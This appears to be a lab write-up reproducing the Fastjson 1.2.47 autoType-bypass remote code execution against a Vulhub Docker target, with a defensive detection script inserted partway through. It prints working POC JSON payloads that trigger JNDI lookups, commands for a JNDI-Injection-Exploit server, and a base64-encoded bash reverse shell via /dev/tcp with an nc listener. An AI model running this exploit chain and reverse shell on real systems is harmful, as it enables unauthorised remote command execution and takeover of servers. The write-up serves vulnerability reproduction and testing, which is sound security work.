[Vulnerability Reproduction] Fastjson_1.2.47_rce

Thanks to the Internet for sharing knowledge and wisdom. In a society ruled by law, please abide by relevant laws and regulations

Article directory

      • 1.1. Vulnerability description
      • 1.2. Vulnerability level
      • 1.3. Affected versions
      • 1.4. Vulnerability reproduction
        • 1. Basic environment
        • 2. Vulnerability detection
        • 3. Vulnerability verification
      • 1.5. Further exploitation
        • 1. Reverse shell
Description                Content
Vulnerability number
Vulnerability name         Fastjson 1.2.47 remote execution vulnerability
Vulnerability rating       High risk
Scope of impact            Fastjson 1.2.47
Vulnerability description
Repair plan

1.1. Vulnerability description

Fastjson is an open-source JSON parser developed by Alibaba. It performs well and is widely used in the Java projects of major vendors. Fastjson added a deserialization whitelist after version 1.2.24. In versions before 1.2.48, an attacker can use a specially constructed JSON string to bypass the whitelist check and execute arbitrary commands. The bypass works in two steps: deserializing a java.lang.Class object whose val names the target class makes Fastjson load that class and cache it in its type mappings, and a second object that names the cached class in @type is then resolved from the cache without the autoType check, so its dataSourceName triggers a JNDI lookup.

1.2. Vulnerability level

High risk

1.3. Affected versions

1.2.47

1.4. Vulnerability reproduction

1. Basic environment

Path: Vulhub/fastjson/1.2.47-rce

Start the test environment:

sudo docker-compose up -d

Visit http://your-ip:8090/ and you will see a JSON object returned.

After changing the Content-Type to application/json, you can POST a new JSON object to it, and the backend will parse it with Fastjson.

Send test data:

{"name":"hello", "age":20}

2. Vulnerability detection

Use the BurpSuite extension FastjsonScan to detect the vulnerability.

POC:

{
    "axin":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "is":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://s0tgwxk05ll1qvmz0lwr27u0prvhj6.oastify.com/aaa",
        "autoCommit":true
    }
}

Test with DNSLog: a DNS lookup for the dataSourceName host confirms that the JNDI lookup was triggered.
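As an added defensive example (not code from the original post or from Vulhub): a small Python checker that a WAF rule or log-review script could apply to request bodies, flagging the two-object shape of the POC above; the attacker host in the constructed sample body is a placeholder.

```python
import json
import re

# Added example, not from the original post. It flags request bodies shaped
# like the page's POC: one object {"@type":"java.lang.Class","val":C} makes
# Fastjson load and cache class C, a second object with "@type":C is then
# resolved from the cache without the autoType check, and its dataSourceName
# points Fastjson at an attacker-controlled JNDI (rmi:// or ldap://) URL.
JNDI_URL = re.compile(r"^\s*(rmi|ldap|ldaps|iiop)://", re.IGNORECASE)


def walk(node):
    """Yield every JSON object nested anywhere inside node."""
    if isinstance(node, dict):
        yield node
        for v in node.values():
            yield from walk(v)
    elif isinstance(node, list):
        for v in node:
            yield from walk(v)


def classify(body):
    """Return 'clean', 'suspicious' (autoType markers only) or 'bypass'."""
    try:
        doc = json.loads(body)   # also decodes \u-escaped keys like "\u0040type"
    except ValueError:
        return "clean"           # not JSON, nothing for Fastjson to deserialize
    cached, typed, jndi = set(), set(), False
    for obj in walk(doc):
        t = obj.get("@type")
        if t == "java.lang.Class" and isinstance(obj.get("val"), str):
            cached.add(obj["val"])          # class pre-loaded into the cache
        elif isinstance(t, str):
            typed.add(t)                    # class requested for instantiation
        dsn = obj.get("dataSourceName")
        if isinstance(dsn, str) and JNDI_URL.match(dsn):
            jndi = True                     # JdbcRowSetImpl JNDI sink
    if cached & typed and jndi:
        return "bypass"
    return "suspicious" if (cached or typed or jndi) else "clean"


# Constructed sample bodies (ATTACKER_HOST is a placeholder, not a real host).
BENIGN = '{"name":"hello", "age":20}'
BYPASS = ('{"axin":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},'
          '"is":{"@type":"com.sun.rowset.JdbcRowSetImpl",'
          '"dataSourceName":"rmi://ATTACKER_HOST:1099/x","autoCommit":true}}')
```

The checker deliberately ignores key order, so it also catches the pattern when the objects are nested or reordered; any "suspicious" hit is worth logging even when it falls short of the full bypass shape.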

3. Vulnerability verification

Use the JNDI-Injection-Exploit tool to start the RMI server.

Create the hello file in the /tmp directory

┌──(kali㉿kali)-[~/tools/JNDI-Injection-Exploit/target]
└─$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "touch /tmp/demo" -A "192.168.80.141"
[ADDRESS] >> 192.168.80.141
[COMMAND] >> touch /tmp/demo
----------------------------JNDI Links----------------------------------
Target environment(Build in JDK 1.7 whose trustURLCodebase is true):
rmi://192.168.80.141:1099/fuk3fq
ldap://192.168.80.141:1389/fuk3fq
Target environment(Build in JDK 1.8 whose trustURLCodebase is true):
rmi://192.168.80.141:1099/slgipa
ldap://192.168.80.141:1389/slgipa
Target environment(Build in JDK whose trustURLCodebase is false and have Tomcat 8 + or SpringBoot 1.2.x + in classpath):
rmi://192.168.80.141:1099/zsjp7n

----------------------------Server Log--------------------------
2023-09-08 03:53:56 [JETTYSERVER]>> Listening on 0.0.0.0:8180
2023-09-08 03:53:56 [RMISERVER] >> Listening on 0.0.0.0:1099
2023-09-08 03:53:57 [LDAPSERVER] >> Listening on 0.0.0.0:1389

Send the POC to the Fastjson server; the malicious class is loaded remotely over the RMI protocol.

{
    "axin":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "is":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.80.141:1099/slgipa",
        "autoCommit":true
    }
}

Enter the Docker container to verify that the file was created:

1.5. Further exploitation

1. Reverse shell

Construct a reverse shell command and base64-encode it:

bash -i >& /dev/tcp/192.168.80.141/1234 0>&1

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjgwLjE0MS8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}

Listen on port 1234:

nc -lvp 1234

Start the RMI service:

┌──(kali㉿kali)-[~/tools/JNDI-Injection-Exploit/target]
└─$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjgwLjE0MS8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}" -A "192.168.80.141"
[ADDRESS] >> 192.168.80.141
[COMMAND] >> bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjgwLjE0MS8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}
----------------------------JNDI Links----------------------------------
Target environment(Build in JDK 1.8 whose trustURLCodebase is true):
rmi://192.168.80.141:1099/fd5cfs
ldap://192.168.80.141:1389/fd5cfs
Target environment(Build in JDK 1.7 whose trustURLCodebase is true):
rmi://192.168.80.141:1099/flbdik
ldap://192.168.80.141:1389/flbdik
Target environment(Build in JDK whose trustURLCodebase is false and have Tomcat 8 + or SpringBoot 1.2.x + in classpath):
rmi://192.168.80.141:1099/m8yxp6

----------------------------Server Log--------------------------
2023-09-08 04:02:36 [JETTYSERVER]>> Listening on 0.0.0.0:8180
2023-09-08 04:02:36 [RMISERVER] >> Listening on 0.0.0.0:1099
2023-09-08 04:02:36 [LDAPSERVER] >> Listening on 0.0.0.0:1389

POC:

{
    "axin":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "is":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://192.168.80.141:1389/fd5cfs",
        "autoCommit":true
    }
}

The listener receives the reverse shell.